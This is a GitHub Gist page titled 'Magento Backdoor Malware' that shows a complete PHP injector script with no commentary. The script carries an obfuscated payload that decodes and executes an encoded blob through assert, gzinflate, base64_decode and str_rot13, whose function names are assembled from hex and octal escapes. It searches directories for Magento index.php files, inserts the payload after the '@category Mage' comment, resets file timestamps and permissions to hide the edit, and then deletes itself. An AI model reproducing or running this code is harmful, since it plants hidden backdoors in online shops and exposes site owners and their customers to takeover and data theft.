Created
September 8, 2018 07:33
-
-
Save luckyduck/1a4d9f9dca59a816b12adf9427661ab0 to your computer and use it in GitHub Desktop.
Magento Backdoor Malware
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| WORD | |
| <?php | |
| $regexTag = '# \* @category \s*Mage#'; | |
| $code = <<<'CODE' | |
| */ | |
| $swvJgN7="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";$xnDU7="Fl1YmASDIlxhY/AX9mB3Ipa0mNtC9j411LNWnIdeERLMB";$XYD8Jw="\x61";$UbK0prw="\x73\x74";$aIYkAW="\147\172\151";$iIhWWKU5="\142\x61\x73";$XYD8Jw.="\x73";$iIhWWKU5.="\x65\66\x34";$aIYkAW.="\156\x66";$xnDU7.="5pT2FbcJngH5YzRzgfdrHFxM1pdJnsyS2zbhWxJrtHn2u";$UbK0prw.="\162\137\x72";$UbK0prw.="\x6f\164";$iIhWWKU5.="\x5f\144\145\143";$xnDU7.="cLD1x2uuMzMwPBgeLzIYhroKWTxHM+HDep5TvbzywABYN";$aIYkAW.="\154\141";$XYD8Jw.="\163\145";$iIhWWKU5.="\157\x64\x65";$UbK0prw.="\61\x33";$xnDU7.="j2TlLbXcceXnzgHZdlUxdvM6E2L7uTyPGtBYdzgLN";$XYD8Jw.="\x72\164";$aIYkAW.="\x74\x65";@$XYD8Jw($aIYkAW($iIhWWKU5($UbK0prw($xnDU7)))); | |
| /* | |
| CODE; | |
| define("CODE_PART", '$swvJgN7'); | |
| $injectType = 1; // 0 - before tag, 1 - after tag | |
| $indexFiles = array('index.php'); | |
| set_time_limit(1800); | |
| // func | |
| function indexEditor($localpath, $indexFile, $regexTag, $code) { | |
| $fullpath = $localpath . '/' . $indexFile; | |
| edit($fullpath, $code, $regexTag); | |
| } | |
| function edit($filepath, $code, $regexTag) { | |
| clearstatcache(); | |
| $perms = 0777 & fileperms($filepath); | |
| chmod($filepath, 0666); | |
| $content = file_get_contents($filepath); | |
| preg_match($regexTag, $content, $matches); | |
| if (!$matches) | |
| return; | |
| $tag = current($matches); | |
| $tag_exists = false; | |
| global $injectType; | |
| $codePart = trim($code); | |
| if ((defined("CODE_PART")) && (CODE_PART)) | |
| $codePart = CODE_PART; | |
| if ((strpos($content, $tag) !== false) && (strpos($content, $codePart) === false)) { | |
| $tag_exists = true; | |
| switch ($injectType) { | |
| case 0: | |
| $replacement = $code . "\r\n" . $tag; | |
| break; | |
| case 1: | |
| $replacement = $tag . "\r\n" . $code; | |
| break; | |
| } | |
| } | |
| if ($tag_exists) { | |
| $lastmod = filemtime($filepath); | |
| $inject = str_replace($tag, $replacement, $content); | |
| if (is_writable($filepath)) { | |
| file_put_contents($filepath, $inject, LOCK_EX); | |
| touch($filepath, $lastmod); | |
| chmod($filepath, $perms); | |
| } else { | |
| @unlink($filepath); | |
| file_put_contents($filepath, $inject, LOCK_EX); | |
| } | |
| $mcontent = file_get_contents($filepath); | |
| if (substr_count($mcontent, $code)) { | |
| echo ' Success >> ' . $filepath . '<br>'; | |
| } else { | |
| echo ' Cant Edit >> ' . $filepath . '<br>'; | |
| } | |
| } else { | |
| echo ' Already edited >> ' . $filepath . '<br>'; | |
| return; | |
| } | |
| } | |
| function path_finder() { | |
| $p = __FILE__; | |
| if (empty($p)) { | |
| exit('Cant find the path'); | |
| } else { | |
| $p = str_replace('\\', '/', $p); | |
| $p = trim($p, '/'); | |
| $p = substr_count($p, '/') - 1; | |
| } | |
| $pth = ''; | |
| for ($k = 1; $k <= $p; $k++) { | |
| if (!is_readable(str_repeat('../', $k))) { | |
| $pth = trim(str_repeat('../', $k - 1)); | |
| break; | |
| } | |
| } | |
| if ($pth) { | |
| return $pth; | |
| } else { | |
| return trim(str_repeat('../', $p - 1)); | |
| } | |
| } | |
| function smartscan($dir) { | |
| if (function_exists("scandir")) { | |
| return scandir($dir); | |
| } else { | |
| $dh = opendir($dir); | |
| $files = array(); | |
| while (false !== ($filename = readdir($dh))) | |
| $files[] = $filename; | |
| return $files; | |
| } | |
| } | |
| $dir = path_finder(); | |
| $dd = array($dir); | |
| for ($i = 0; $i < 6; $i++) { | |
| $tmp = array(); | |
| foreach ($dd as $d) { | |
| $res = smartscan($d); | |
| foreach ($res as $v) { | |
| if (in_array($v, $indexFiles)) { | |
| indexEditor($localpath = $d, $indexFile = $v, $regexTag, $code); | |
| } else { | |
| if (is_dir($d . '/' . $v) && is_readable($d . '/' . $v) && ($v !== ".") && ($v !== "..")) { | |
| $tmp[] = $d . '/' . $v; | |
| } | |
| } | |
| } | |
| } | |
| $dd = $tmp; | |
| } | |
| echo "Finish!"; | |
| unlink(__FILE__); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment